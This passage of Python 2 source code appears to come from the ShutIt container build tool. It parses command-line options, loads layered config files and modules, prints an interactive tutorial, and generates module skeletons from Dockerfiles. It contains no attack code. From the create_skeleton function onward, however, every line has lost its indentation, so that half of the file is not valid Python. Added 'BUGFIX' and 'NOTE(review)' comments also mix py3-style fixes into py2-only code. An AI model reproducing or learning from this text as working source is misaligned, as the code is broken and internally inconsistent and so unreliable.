        sub_parsers[action].add_argument('--image_tag', help='Build container from specified image - if there is a symbolic reference, please use that, eg localhost.localdomain:5000/myref', default='')
        sub_parsers[action].add_argument('--tag_modules', help='''Tag each module after it's successfully built regardless of the module config and based on the repository config.''', default=False, const=True, action='store_const')
        sub_parsers[action].add_argument('-m', '--shutit_module_path', default=None, help='List of shutit module paths, separated by colons. ShutIt registers modules by running all .py files in these directories.')
        sub_parsers[action].add_argument('--pause', help='Pause between commands to avoid race conditions.', default='0.05', type=check_pause)
        sub_parsers[action].add_argument('--debug', help='Show debug.', default=False, const=True, action='store_const')
        sub_parsers[action].add_argument('--trace', help='Trace function calls', const=True, default=False, action='store_const')
        sub_parsers[action].add_argument('--interactive', help='Level of interactive. 0 = none, 1 = honour pause points and config prompting, 2 = query user on each module, 3 = tutorial mode', default='1')
        sub_parsers[action].add_argument('--ignorestop', help='Ignore STOP files', const=True, default=False, action='store_const')
        sub_parsers[action].add_argument('--ignoreimage', help='Ignore disallowed images', const=True, default=False, action='store_const')
        sub_parsers[action].add_argument('--imageerrorok', help='Exit without error if allowed images fails (used for test scripts)', const=True, default=False, action='store_const')
        sub_parsers[action].add_argument('--deps_only', help='build deps only, tag with suffix "_deps"', const=True, default=False, action='store_const')
    args_list = sys.argv[1:]
    # Splice in extra arguments from SHUTIT_OPTIONS (GREP_OPTIONS-like
    # semantics, see docstring). Skipped for the 'skeleton' action.
    if os.environ.get('SHUTIT_OPTIONS', None) and args_list[0] != 'skeleton':
        env_args = os.environ['SHUTIT_OPTIONS'].strip()
        # Split escaped backslashes
        env_args_split = re.split(r'(\\\\)', env_args)
        # Split non-escaped spaces
        env_args_split = [re.split(r'(?<!\\)( )', item) for item in env_args_split]
        # Flatten
        env_args_split = [item for sublist in env_args_split for item in sublist]
        # Split escaped spaces
        env_args_split = [re.split(r'(\\ )', item) for item in env_args_split]
        # Flatten
        env_args_split = [item for sublist in env_args_split for item in sublist]
        # Trim empty strings
        env_args_split = [item for item in env_args_split if item != '']
        # We know we don't have to deal with an empty env argument string
        env_args_list = ['']
        # Interpret all of the escape sequences
        for item in env_args_split:
            if item == ' ':
                # Unescaped space: start a new argument.
                env_args_list.append('')
            elif item == '\\ ':
                # Escaped space: literal space inside the current argument.
                env_args_list[-1] = env_args_list[-1] + ' '
            elif item == '\\\\':
                # Escaped backslash: a single literal backslash.
                env_args_list[-1] = env_args_list[-1] + '\\'
            else:
                env_args_list[-1] = env_args_list[-1] + item
        # Insert the env-derived args just after the action word.
        args_list[1:1] = env_args_list
    args = parser.parse_args(args_list)
    # What are we asking shutit to do?
    cfg['action']['list_configs'] = args.action == 'list_configs'
    cfg['action']['list_modules'] = args.action == 'list_modules'
    cfg['action']['list_deps'] = args.action == 'list_deps'
    cfg['action']['serve'] = args.action == 'serve'
    cfg['action']['skeleton'] = args.action == 'skeleton'
    cfg['action']['build'] = args.action == 'build'
    # This mode is a bit special - it's the only one with different arguments
    if cfg['action']['skeleton']:
        # --script, --dockerfile and --example are mutually exclusive.
        if (args.dockerfile and (args.script or args.example)) or (args.example and args.script):
            shutit_global.shutit.fail('Cannot have any two of script, -d/--dockerfile Dockerfile or --example as arguments')
        cfg['skeleton'] = {
            'path': args.module_directory,
            'module_name': args.module_name,
            'base_image': args.base_image,
            'domain': args.domain,
            'domainhash': str(get_hash(args.domain)),
            'depends': args.depends,
            'script': args.script,
            'example': args.example,
            'dockerfile': args.dockerfile
        }
        return
    shutit_home = cfg['shutit_home'] = os.path.expanduser('~/.shutit')
    # We're not creating a skeleton, so make sure we have the infrastructure
    # in place for a user-level storage area
    if not os.path.isdir(shutit_home):
        os.mkdir(shutit_home, 0o700)
    if not os.path.isfile(os.path.join(shutit_home, 'config')):
        # Create an empty config with restrictive (0600) permissions.
        os.close(os.open(
            os.path.join(shutit_home, 'config'),
            os.O_WRONLY | os.O_CREAT,
            0o600
        ))
    # Default this to False as it's not always set (mostly for --debug calls).
    cfg['list_configs']['cfghistory'] = False
    cfg['list_modules']['long'] = False
    cfg['list_modules']['sort'] = None
    # Persistence-related arguments.
    if cfg['action']['build']:
        cfg['repository']['push'] = args.push
        cfg['repository']['export'] = args.export
        cfg['repository']['save'] = args.save
    elif cfg['action']['list_configs']:
        cfg['list_configs']['cfghistory'] = args.history
    elif cfg['action']['list_modules']:
        cfg['list_modules']['long'] = args.long
        cfg['list_modules']['sort'] = args.sort
    # What are we building on? Convert arg to conn_module we use.
    if args.delivery == 'docker' or args.delivery == 'target':
        cfg['build']['conn_module'] = 'shutit.tk.conn_docker'
        cfg['build']['delivery'] = 'target'
    elif args.delivery == 'ssh':
        cfg['build']['conn_module'] = 'shutit.tk.conn_ssh'
        cfg['build']['delivery'] = 'ssh'
    elif args.delivery == 'bash':
        cfg['build']['conn_module'] = 'shutit.tk.conn_bash'
        cfg['build']['delivery'] = 'bash'
    # NOTE(review): 'is None' would be the idiomatic comparison here.
    elif args.delivery == None:
        cfg['build']['conn_module'] = None
        cfg['build']['delivery'] = 'target'
    # Get these early for this part of the build.
    # These should never be config arguments, since they are needed before config is passed in.
    if args.shutit_module_path is not None:
        module_paths = args.shutit_module_path.split(':')
        if '.' not in module_paths:
            if cfg['build']['debug']:
                shutit_global.shutit.log('Working directory path not included, adding...')
                time.sleep(1)
            module_paths.append('.')
        # Re-inject as a config override so it flows through config parsing.
        args.set.append(('host', 'shutit_module_path', ':'.join(module_paths)))
    cfg['build']['debug'] = args.debug
    cfg['build']['trace'] = args.trace
    cfg['build']['interactive'] = int(args.interactive)
    cfg['build']['command_pause'] = float(args.pause)
    cfg['build']['extra_configs'] = args.config
    cfg['build']['config_overrides'] = args.set
    cfg['build']['ignorestop'] = args.ignorestop
    cfg['build']['ignoreimage'] = args.ignoreimage
    cfg['build']['imageerrorok'] = args.imageerrorok
    cfg['build']['tag_modules'] = args.tag_modules
    cfg['build']['deps_only'] = args.deps_only
    cfg['target']['docker_image'] = args.image_tag
    # Finished parsing args.
    # Sort out config path
    if cfg['build']['interactive'] >= 3 or cfg['action']['list_configs'] or cfg['action']['list_modules'] or cfg['action']['list_deps'] or cfg['build']['debug']:
        cfg['build']['log_config_path'] = '/tmp/shutit/config/' + cfg['build']['build_id']
        if os.path.exists(cfg['build']['log_config_path']):
            print(cfg['build']['log_config_path'] + ' exists. Please move and re-run.')
            sys.exit()
        os.makedirs(cfg['build']['log_config_path'])
    # Tutorial stuff.
    if cfg['build']['interactive'] >= 3:
        print textwrap.dedent("""\
================================================================================
SHUTIT - INTRODUCTION
================================================================================
ShutIt is a script that allows the building of static target environments.
allowing a high degree of flexibility and easy conversion from other build
methods (eg bash scripts)
It is configured through command-line arguments (see --help) and .cnf files.
================================================================================
================================================================================
CONFIG
================================================================================
The config is read in the following order:
================================================================================
~/.shutit/config
- Host- and username-specific config for this host.
/path/to/this/shutit/module/configs/build.cnf
- Config specifying what should be built when this module is invoked.
/your/path/to/<configname>.cnf
- Passed-in config (via --config, see --help)
command-line overrides, eg -s com.mycorp.mymodule.module name value
================================================================================
Config items look like this:
[section]
name:value
or as command-line overrides:
-s section name value
================================================================================
""" + colour('31', '\n[Hit return to continue]'))
        util_raw_input()
        print textwrap.dedent("""\
================================================================================
MODULES
================================================================================
Each module (which is a .py file) has a lifecycle, "module_id" and "run_order".
The lifecycle (briefly) is as follows:
foreach module:
remove all modules config'd for removal
foreach module:
build
tag
stop all modules already started
do repository work configured
start all modules that were stopped
start
foreach module:
test module
stop all modules already started
foreach module:
finalize module
and these stages are run from the module code, returning True or False as
appropriate.
The module_id is a string that uniquely identifies the module.
The run_order is a float that defines the order in which the module should be
run relative to other modules. This guarantees a deterministic ordering of
the modules run.
See shutit_module.py for more detailed documentation on these.
================================================================================
""" + colour('31', '\n[Hit return to continue]'))
        util_raw_input()
        print textwrap.dedent("""\
================================================================================
PAUSE POINTS
================================================================================
Pause points can be placed within the build, which is useful for debugging.
This is used throughout this tutorial.
When debugging, pause_points will output your keyboard input before you finish.
This can help you build your build, as these commands can be pasted into the
module you are developing easily.
To escape a pause point when it happens, hit the "CTRL" and the "]"
key simultaneously.
================================================================================
""" + colour('31', '\n[Hit return to continue]'))
        util_raw_input()
    # Set up trace as fast as possible.
    if shutit.cfg['build']['trace']:
        # NOTE(review): 'indent' default is unused; mutable default kept as-is.
        def tracefunc(frame, event, arg, indent=[0]):
            # Log every Python function entry/exit via sys.settrace.
            if event == "call":
                shutit.log("-> call function: " + frame.f_code.co_name + " " + str(frame.f_code.co_varnames),force_stdout=True)
            elif event == "return":
                shutit.log("<- exit function: " + frame.f_code.co_name,force_stdout=True)
            return tracefunc
        sys.settrace(tracefunc)
def load_configs(shutit):
    """Responsible for loading config files into ShutIt.
    Recurses down from configured shutit module paths.

    Config sources, in order of increasing precedence: built-in defaults,
    host/user-specific .cnf, ~/.shutit/config, the local build.cnf, any
    --config files, then -s/--set command-line overrides.
    """
    cfg = shutit.cfg
    # Get root default config.
    # Entries are either (name, file-like) tuples or plain path strings.
    configs = [('defaults', StringIO.StringIO(_default_cnf))]
    # Add the shutit global host- and user-specific config file.
    configs.append(os.path.join(shutit.shutit_main_dir,
        'configs/' + socket.gethostname() + '_' + cfg['host']['real_user'] + '.cnf'))
    configs.append(os.path.join(cfg['shutit_home'], 'config'))
    # Add the local build.cnf
    configs.append('configs/build.cnf')
    # Get passed-in config(s)
    for config_file_name in cfg['build']['extra_configs']:
        run_config_file = os.path.expanduser(config_file_name)
        if not os.path.isfile(run_config_file):
            print('Did not recognise ' + run_config_file +
                ' as a file - do you need to touch ' + run_config_file + '?')
            sys.exit()
        configs.append(run_config_file)
    # Image to use to start off. The script should be idempotent, so running it
    # on an already built image should be ok, and is advised to reduce diff space required.
    if cfg['build']['interactive'] >= 3 or cfg['action']['list_configs'] or cfg['build']['debug']:
        msg = ''
        print textwrap.dedent("""\n""") + textwrap.dedent("""Looking at config files in the following order:""")
        for c in configs:
            if type(c) is tuple:
                # In-memory configs: show the symbolic name only.
                c = c[0]
            msg = msg + ' \n' + c
            shutit.log(' ' + c)
        if cfg['build']['interactive'] >= 3:
            print textwrap.dedent("""\n""") + msg + textwrap.dedent(colour('31', '\n\n[Hit return to continue]'))
            util_raw_input(shutit=shutit)
        if cfg['action']['list_configs'] or cfg['build']['debug']:
            # Record the config file order for this run.
            # NOTE(review): py2-only 'file()' builtin; assumes log_config_path was
            # created earlier in parse_args -- confirm ordering with caller.
            f = file(cfg['build']['log_config_path'] + '/config_file_order.txt','w')
            f.write(msg)
            f.close()
    # Interpret any config overrides, write to a file and add them to the
    # list of configs to be interpreted
    if cfg['build']['config_overrides']:
        # We don't need layers, this is a temporary configparser
        override_cp = RawConfigParser()
        for o_sec, o_key, o_val in cfg['build']['config_overrides']:
            if not override_cp.has_section(o_sec):
                override_cp.add_section(o_sec)
            override_cp.set(o_sec, o_key, o_val)
        # Serialize the overrides into an in-memory INI and append last,
        # so they take precedence over all file-based config.
        override_fd = StringIO.StringIO()
        override_cp.write(override_fd)
        override_fd.seek(0)
        configs.append(('overrides', override_fd))
    cfg_parser = get_configs(shutit, configs)
    get_base_config(cfg, cfg_parser)
    if cfg['build']['debug']:
        # Set up the manhole.
        # Debug-only: opens an interactive inspection socket into the process.
        manhole.install(
            verbose=True,
            patch_fork=True,
            activate_on=None,
            oneshot_on=None,
            sigmask=manhole.ALL_SIGNALS,
            socket_path=None,
            reinstall_delay=0.5,
            locals=None
        )
def load_shutit_modules(shutit):
    """Load ShutIt modules from every configured module path.

    In debug mode the paths about to be scanned are logged (with a short
    pause so the output is readable) before loading begins.
    """
    module_paths = shutit.cfg['host']['shutit_module_path']
    if shutit.cfg['build']['debug']:
        shutit.log('ShutIt module paths now: ')
        shutit.log(module_paths)
        time.sleep(1)
    for module_path in module_paths:
        load_all_from_path(shutit, module_path)
def list_modules(shutit):
    """Display a list of loaded modules.

    Config items:
    - ['list_modules']['long']
      If set, also print each module's run order value
    - ['list_modules']['sort']
      Select the column by which the list is ordered:
      - id: sort the list by module id
      - run_order: sort the list by module run order
    The output is also saved to ['build']['log_config_path']/module_order.txt
    Dependencies: texttable, operator

    NOTE(review): if ['list_modules']['sort'] is neither 'id' nor
    'run_order' (e.g. the None default set in parse_args), only the header
    row is emitted.
    """
    # list of module ids and other details
    # will also contain column headers
    table_list = []
    if shutit.cfg['list_modules']['long']:
        # --long table: sort modules by run order
        table_list.append(["Order","Module ID","Description","Run Order"])
    else:
        # "short" table ==> sort module by module_id
        table_list.append(["Module ID","Description"])
    if shutit.cfg['list_modules']['sort'] == 'run_order':
        # Map module_id -> run_order, then sort by run_order.
        a = {}
        for m in shutit.shutit_modules:
            a.update({m.module_id:m.run_order})
        # sort dict by run_order; see http://stackoverflow.com/questions/613183/sort-a-python-dictionary-by-value
        b = sorted(a.items(), key=operator.itemgetter(1))
        count = 0
        # now b is a list of tuples (module_id, run_order)
        for pair in b:
            # module_id is the first item of the tuple
            k = pair[0]
            # Linear rescan per id; O(n^2) but module counts are small.
            for m in shutit.shutit_modules:
                if m.module_id == k:
                    count = count + 1
                    if shutit.cfg['list_modules']['long']:
                        table_list.append([str(count),m.module_id,m.description,str(m.run_order)])
                    else:
                        table_list.append([m.module_id,m.description])
    elif shutit.cfg['list_modules']['sort'] == 'id':
        # Collect and sort module ids lexicographically.
        a = []
        for m in shutit.shutit_modules:
            a.append(m.module_id)
        a.sort()
        count = 0
        for k in a:
            for m in shutit.shutit_modules:
                if m.module_id == k:
                    count = count + 1
                    if shutit.cfg['list_modules']['long']:
                        table_list.append([str(count),m.module_id,m.description,str(m.run_order)])
                    else:
                        table_list.append([m.module_id,m.description])
    # format table for display
    import texttable
    table = texttable.Texttable()
    table.add_rows(table_list)
    msg = table.draw()
    print msg
    # Persist the rendered table alongside the run's config logs.
    # NOTE(review): py2-only 'file()' builtin.
    f = file(shutit.cfg['build']['log_config_path'] + '/module_order.txt','w')
    f.write(msg)
    f.close()
def print_config(cfg, hide_password=True, history=False):
    """Return a string representing the config of this ShutIt run.

    Args:
        cfg: the ShutIt config dict; cfg['config_parser'] must hold the
            layered config parser (only consulted when history is True).
        hide_password: if True, values of keys named 'password' or
            'passphrase' are replaced by a repeatedly re-hashed SHA-512
            digest so the plaintext never appears in the output.
        history: if True, annotate each line with which config file set
            the value (or note that it is a code default).

    Returns:
        The config rendered INI-style, with sections and keys sorted.
    """
    cp = cfg['config_parser']
    s = ''
    for k in sorted(cfg.keys()):  # sorted() works on py2 and py3 (keys1.sort() was py2-only)
        # Only string-keyed dict values are config sections; anything else
        # (e.g. the config parser object itself) is skipped.
        if type(k) == str and type(cfg[k]) == dict:
            s += '\n[' + k + ']\n'
            for k1 in sorted(cfg[k].keys()):
                line = k1 + ':'
                # If we want to hide passwords, we do so using a sha512
                # done an arbitrary number of times (27).
                if hide_password and (k1 == 'password' or k1 == 'passphrase'):
                    # BUGFIX: the loop previously re-hashed 's' (the output
                    # accumulated so far) instead of 'p', so the 27 rounds
                    # never fed back into the reported digest.
                    # .encode() keeps this working where sha512 requires bytes.
                    p = hashlib.sha512(cfg[k][k1].encode('utf-8')).hexdigest()
                    for _ in range(27):
                        p = hashlib.sha512(p.encode('utf-8')).hexdigest()
                    line += p
                else:
                    value = cfg[k][k1]
                    # BUGFIX: was 'type(cfg[k][k1] == bool)', which compares
                    # the value to the bool type and takes the type of that
                    # result -- always truthy, so the first branch always ran.
                    if isinstance(value, bool):
                        line += str(value)
                    elif isinstance(value, str):
                        line += value
                    else:
                        # Fall back to str() for other types, matching the
                        # output the original (always-str()) path produced.
                        line += str(value)
                if history:
                    try:
                        line += (30-len(line)) * ' ' + ' # ' + cp.whereset(k, k1)
                    except:
                        # Assume this is because it was never set by a config parser.
                        line += (30-len(line)) * ' ' + ' # ' + "defaults in code"
                s += line + '\n'
    return s
def set_pexpect_child(key, child):
    """Register *child* under *key* in the global pexpect-children map."""
    shutit_global.pexpect_children[key] = child
def get_pexpect_child(key):
    """Look up and return the pexpect child registered under *key*."""
    children = shutit_global.pexpect_children
    return children[key]
def load_all_from_path(shutit, path):
    """Recursively load ShutIt modules from every file under *path*.

    Skips the ShutIt main directory itself, nonexistent paths, and any
    directory containing a STOPBUILD marker file (unless --ignorestop is
    configured).
    """
    #111: handle expanded paths
    path = os.path.abspath(path)
    #http://stackoverflow.com/questions/301134/dynamic-module-import-in-python
    if os.path.abspath(path) == shutit.shutit_main_dir:
        return
    if not os.path.exists(path):
        return
    if os.path.exists(path + '/STOPBUILD') and not shutit.cfg['build']['ignorestop']:
        shutit.log('Ignoring directory: ' + path + ' as it has a STOPBUILD file in it. Pass --ignorestop to shutit run to override.', force_stdout=True)
        return
    for entry in glob.glob(os.path.join(path, '*')):
        # glob already yields absolute paths here; the join is a no-op kept
        # for parity with the original behaviour.
        candidate = os.path.join(path, entry)
        if os.path.isfile(candidate):
            load_mod_from_file(shutit, candidate)
        elif os.path.isdir(candidate):
            load_all_from_path(shutit, candidate)
def load_mod_from_file(shutit, fpath):
    """Loads modules from a .py file into ShutIt if there are no modules from
    this file already.
    We expect to have a callable 'module/0' which returns one or more module
    objects.
    If this doesn't exist we assume that the .py file works in the old style
    (automatically inserting the module into shutit_global) or it's not a shutit
    module.
    """
    fpath = os.path.abspath(fpath)
    # Only .py files can contain ShutIt modules.
    file_ext = os.path.splitext(os.path.split(fpath)[-1])[-1]
    if file_ext.lower() != '.py':
        return
    # Files inside a 'context' directory are build payloads, not modules.
    if re.match('.*\/context\/.*',fpath):
        shutit.log('Ignoring file: "' + fpath + '" as this appears to be part of the context directory')
        return
    # Do we already have modules from this file? If so we know we can skip.
    # Note that this attribute will only be set for 'new style' module loading,
    # this should be ok because 'old style' loading checks for duplicate
    # existing modules.
    # TODO: this is quadratic complexity
    existingmodules = [
        m for m in shutit.shutit_modules
        if getattr(m, '__module_file', None) == fpath
    ]
    if len(existingmodules) > 0:
        return
    # Looks like it's ok to load this file
    if shutit.cfg['build']['debug']:
        shutit.log('Loading source for: ' + fpath)
    # Add this directory to the python path iff not already there.
    directory = os.path.dirname(fpath)
    if directory not in sys.path:
        sys.path.append(os.path.dirname(fpath))
    # Derive a unique, import-safe module name from the path ('=' padding
    # stripped as it is not valid in identifiers).
    # NOTE(review): py2-only -- on py3 b32encode requires bytes and 'imp' is
    # removed in favour of importlib.
    mod_name = base64.b32encode(fpath).replace('=', '')
    pymod = imp.load_source(mod_name, fpath)
    # Got the python module, now time to pull the shutit module(s) out of it.
    # Each factory name maps to the registry its modules belong in.
    targets = [
        ('module', shutit.shutit_modules), ('conn_module', shutit.conn_modules)
    ]
    shutit.cfg['build']['source'] = {}
    for attr, target in targets:
        modulefunc = getattr(pymod, attr, None)
        # Old style or not a shutit module, nothing else to do
        if not callable(modulefunc):
            return
        modules = modulefunc()
        if type(modules) is not list:
            # Factory may return a single module or a list; normalise.
            modules = [modules]
        for module in modules:
            setattr(module, '__module_file', fpath)
            ShutItModule.register(module.__class__)
            target.add(module)
    # Keep the raw source of every loaded module file for later reporting.
    shutit.cfg['build']['source'][fpath] = open(fpath).read()
# Build report
def build_report(shutit, msg=''):
    """Responsible for constructing a report to be output as part of the build.
    Returns report as a string.

    The report contains the command history, the optional *msg* line, any
    accumulated cfg['build']['report'] text, and the target container id
    when one exists, bracketed by the build id for log correlation.
    """
    s = ''
    s += '################################################################################\n'
    s += '# COMMAND HISTORY BEGIN ' + shutit_global.cfg['build']['build_id'] + '\n'
    s += get_commands(shutit)
    s += '# COMMAND HISTORY END ' + shutit_global.cfg['build']['build_id'] + '\n'
    s += '################################################################################\n'
    s += '################################################################################\n'
    s += '# BUILD REPORT FOR BUILD BEGIN ' + shutit_global.cfg['build']['build_id'] + '\n'
    s += '# ' + msg + '\n'
    if shutit_global.cfg['build']['report'] != '':
        s += shutit_global.cfg['build']['report'] + '\n'
    else:
        s += '# Nothing to report\n'
    # Only present once the connection module has started a container.
    if 'container_id' in shutit.cfg['target']:
        s += '# CONTAINER_ID: ' + shutit.cfg['target']['container_id'] + '\n'
    s += '# BUILD REPORT FOR BUILD END ' + shutit_global.cfg['build']['build_id'] + '\n'
    # NOTE(review): this closing rule is 79 '#'s vs 80 elsewhere -- presumably unintentional.
    s += '###############################################################################\n'
    return s
def get_commands(shutit):
    """Return the non-redacted commands run so far, one per line.

    Non-string entries in the command history are skipped (these are,
    per the original intent, the redacted commands).
    """
    lines = [c + '\n' for c in shutit.shutit_command_history if type(c) == str]
    return ''.join(lines)
def get_hash(string):
    """Return a positive CRC32 checksum of *string*.

    Used to derive the integer ("domainhash") part of a module's run
    order, eg com.openbet == 1003189494.

    Recommended means of determining run order integer part.

    Accepts text or bytes: text is UTF-8 encoded first, so this works on
    interpreters where binascii.crc32 requires bytes (Python 3) as well
    as with the byte strings the original code passed.
    """
    if isinstance(string, str):
        string = string.encode('utf-8')
    return abs(binascii.crc32(string))
def create_skeleton(shutit):
"""Helper function to create a standard module directory ready to run
and tinker with.
"""
shutit_dir = sys.path[0]
# Set up local directories
skel_path = shutit.cfg['skeleton']['path']
skel_module_name = shutit.cfg['skeleton']['module_name']
skel_domain = shutit.cfg['skeleton']['domain']
skel_domain_hash = shutit.cfg['skeleton']['domainhash']
skel_depends = shutit.cfg['skeleton']['depends']
skel_base_image = shutit.cfg['skeleton']['base_image']
skel_script = shutit.cfg['skeleton']['script']
skel_example = shutit.cfg['skeleton']['example']
skel_dockerfile = shutit.cfg['skeleton']['dockerfile']
# Set up dockerfile cfg
shutit.cfg['dockerfile']['base_image'] = skel_base_image
shutit.cfg['dockerfile']['cmd'] = '/bin/bash'
shutit.cfg['dockerfile']['user'] = ''
shutit.cfg['dockerfile']['maintainer'] = ''
shutit.cfg['dockerfile']['entrypoint'] = ''
shutit.cfg['dockerfile']['expose'] = []
shutit.cfg['dockerfile']['env'] = []
shutit.cfg['dockerfile']['volume'] = []
shutit.cfg['dockerfile']['onbuild'] = []
shutit.cfg['dockerfile']['script'] = []
# Check setup
if len(skel_path) == 0 or skel_path[0] != '/':
shutit.fail('Must supply a directory and it must be absolute')
if os.path.exists(skel_path):
shutit.fail(skel_path + ' already exists')
if len(skel_module_name) == 0:
shutit.fail('Must supply a name for your module, eg mymodulename')
if not re.match('^[a-zA-z_][0-9a-zA-Z_]+$', skel_module_name):
shutit.fail('Module names must comply with python classname standards: cf: http://stackoverflow.com/questions/10120295/valid-characters-in-a-python-class-name')
if len(skel_domain) == 0:
shutit.fail('Must supply a domain for your module, eg com.yourname.madeupdomainsuffix')
os.makedirs(skel_path)
os.mkdir(os.path.join(skel_path, 'configs'))
os.mkdir(os.path.join(skel_path, 'context'))
os.mkdir(os.path.join(skel_path, 'bin'))
os.mkdir(os.path.join(skel_path, 'dockerfile'))
templatemodule_path = os.path.join(skel_path, skel_module_name + '.py')
readme_path = os.path.join(skel_path, 'README.md')
buildsh_path = os.path.join(skel_path, 'bin', 'build.sh')
testsh_path = os.path.join(skel_path, 'bin', 'test.sh')
runsh_path = os.path.join(skel_path, 'bin', 'run.sh')
buildpushsh_path = os.path.join(skel_path, 'bin', 'build_and_push.sh')
buildcnf_path = os.path.join(skel_path, 'configs', 'build.cnf')
pushcnf_path = os.path.join(skel_path, 'configs', 'push.cnf')
builddockerfile_path = os.path.join(skel_path, 'Dockerfile')
if skel_dockerfile:
if os.path.basename(skel_dockerfile) != 'Dockerfile':
skel_dockerfile += '/Dockerfile'
if not os.path.exists(skel_dockerfile):
if urlparse.urlparse(skel_dockerfile)[0] == '':
shutit.fail('Dockerfile "' + skel_dockerfile + '" must exist')
dockerfile_contents = urllib2.urlopen(skel_dockerfile).read()
dockerfile_dirname = None
else:
dockerfile_contents = open(skel_dockerfile).read()
dockerfile_dirname = os.path.dirname(skel_dockerfile)
if dockerfile_dirname == '':
shutit.fail('Dockerfile must be absolute')
if os.path.exists(dockerfile_dirname):
shutil.rmtree(skel_path + '/context')
shutil.copytree(dockerfile_dirname, skel_path + '/context')
# Remove Dockerfile as it's not part of the context.
if os.path.isfile(skel_path + '/context/Dockerfile'):
os.remove(skel_path + '/context/Dockerfile')
# Change to this context
os.chdir(dockerfile_dirname)
# Wipe the command as we expect one in the file.
shutit.cfg['dockerfile']['cmd'] = ''
dockerfile_list = parse_dockerfile(shutit, dockerfile_contents)
# Set defaults from given dockerfile
for item in dockerfile_list:
# These items are not order-dependent and don't affect the build, so we collect them here:
docker_command = item[0].upper()
if docker_command == 'FROM':
# Should be only one of these
shutit.cfg['dockerfile']['base_image'] = item[1]
elif docker_command == "ONBUILD":
# Maps to finalize :) - can we have more than one of these? assume yes
# This contains within it one of the above commands, so we need to abstract this out.
shutit.cfg['dockerfile']['onbuild'].append(item[1])
elif docker_command == "MAINTAINER":
shutit.cfg['dockerfile']['maintainer'] = item[1]
elif docker_command == "VOLUME":
# Put in the run.sh.
try:
shutit.cfg['dockerfile']['volume'].append(' '.join(json.loads(item[1])))
except:
shutit.cfg['dockerfile']['volume'].append(item[1])
elif docker_command == 'EXPOSE':
# Put in the run.sh.
shutit.cfg['dockerfile']['expose'].append(item[1])
elif docker_command == "ENTRYPOINT":
# Put in the run.sh? Yes, if it exists it goes at the front of cmd
try:
shutit.cfg['dockerfile']['entrypoint'] = ' '.join(json.loads(item[1]))
except:
shutit.cfg['dockerfile']['entrypoint'] = item[1]
elif docker_command == "CMD":
# Put in the run.sh
try:
shutit.cfg['dockerfile']['cmd'] = ' '.join(json.loads(item[1]))
except:
shutit.cfg['dockerfile']['cmd'] = item[1]
# Other items to be run through sequentially (as they are part of the script)
if docker_command == "USER":
# Put in the start script as well as su'ing from here - assuming order dependent?
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
# We assume the last one seen is the one we use for the image.
# Put this in the default start script.
shutit.cfg['dockerfile']['user'] = item[1]
elif docker_command == 'ENV':
# Put in the run.sh.
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
# Set in the build
shutit.cfg['dockerfile']['env'].append(item[1])
elif docker_command == "RUN":
# Only handle simple commands for now and ignore the fact that Dockerfiles run
# with /bin/sh -c rather than bash.
try:
shutit.cfg['dockerfile']['script'].append((docker_command, ' '.join(json.loads(item[1]))))
except:
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
elif docker_command == "ADD":
# Send file - is this potentially got from the web? Is that the difference between this and COPY?
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
elif docker_command == "COPY":
# Send file
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
elif docker_command == "WORKDIR":
# Push and pop
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
elif docker_command == "COMMENT":
# Push and pop
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
# We now have the script, so let's construct it inline here
templatemodule = ''
# Header.
templatemodule += '''
# Created from dockerfile: ''' + skel_dockerfile + '''
# Maintainer: ''' + shutit.cfg['dockerfile']['maintainer'] + '''
from shutit_module import ShutItModule
class template(ShutItModule):
def is_installed(self, shutit):
return False
'''
# build
build = ''
numpushes = 0
wgetgot = False
for item in shutit.cfg['dockerfile']['script']:
dockerfile_command = item[0].upper()
dockerfile_args = item[1].split()
cmd = ' '.join(dockerfile_args).replace("'", "\\'")
if dockerfile_command == 'RUN':
build += """\n\t\tshutit.send('""" + cmd + """')"""
elif dockerfile_command == 'WORKDIR':
build += """\n\t\tshutit.send('pushd """ + cmd + """')"""
numpushes = numpushes + 1
elif dockerfile_command == 'COPY' or dockerfile_command == 'ADD':
# The <src> path must be inside the context of the build; you cannot COPY ../something /something, because the first step of a docker build is to send the context directory (and subdirectories) to the docker daemon.
if dockerfile_args[0][0:1] == '..' or dockerfile_args[0][0] == '/' or dockerfile_args[0][0] == '~':
shutit.fail('Invalid line: ' + str(dockerfile_args) + ' file must be in local subdirectory')
if dockerfile_args[1][-1] == '/':
# Dir we're COPYing or ADDing to
destdir = dockerfile_args[1]
# File/dir we're COPYing or ADDing from
fromfile = dockerfile_args[0]
# Final file/dir
outfile = destdir + fromfile
if os.path.isfile(fromfile):
outfiledir = os.path.dirname(fromfile)
build += """\n\t\tshutit.send('mkdir -p """ + destdir + '/' + outfiledir + """')"""
elif os.path.isdir(fromfile):
build += """\n\t\tshutit.send('mkdir -p """ + destdir + fromfile + """')"""
else:
outfile = dockerfile_args[1]
# If this is something we have to wget:
if dockerfile_command == 'ADD' and urlparse.urlparse(dockerfile_args[0])[0] != '':
if not wgetgot:
build += """\n\t\tshutit.install('wget')"""
wgetgot = True
if dockerfile_args[1][-1] == '/':
destdir = destdir[0:-1]
outpath = urlparse.urlparse(dockerfile_args[0])[2]
outpathdir = os.path.dirname(outpath)
build += """\n\t\tshutit.send('mkdir -p """ + destdir + outpathdir + """')"""
build += """\n\t\tshutit.send('wget -O """ + destdir + outpath + ' ' + dockerfile_args[0] + """')"""
else:
outpath = dockerfile_args[1]
destdir = os.path.dirname(dockerfile_args[1])
build += """\n\t\tshutit.send('mkdir -p """ + destdir + """')"""
build += """\n\t\tshutit.send('wget -O """ + outpath + ' ' + dockerfile_args[0] + """')"""
else:
# From the local filesystem on construction:
localfile = dockerfile_args[0]
# Local file location on build:
buildstagefile = 'context/' + dockerfile_args[0]
## TODO replace with sha1
#tmpstr = 'aksljdfhaksfhd'
#if localfile[-4:] == '.tar':
# build += """\n\t\tshutit.send_file('""" + outfile + '/' + localfile + """')"""
#elif localfile[-4:] == '.bz2':
#elif localfile[-3:] == '.gz':
#elif localfile[-3:] == '.xz':
if os.path.isdir(localfile):
build += """\n\t\tshutit.send_host_dir('""" + outfile + """', '""" + buildstagefile + """')"""
else:
build += """\n\t\tshutit.send_host_file('""" + outfile + """', '""" + buildstagefile + """')"""
elif dockerfile_command == 'ENV':
cmd = '='.join(dockerfile_args).replace("'", "\\'")
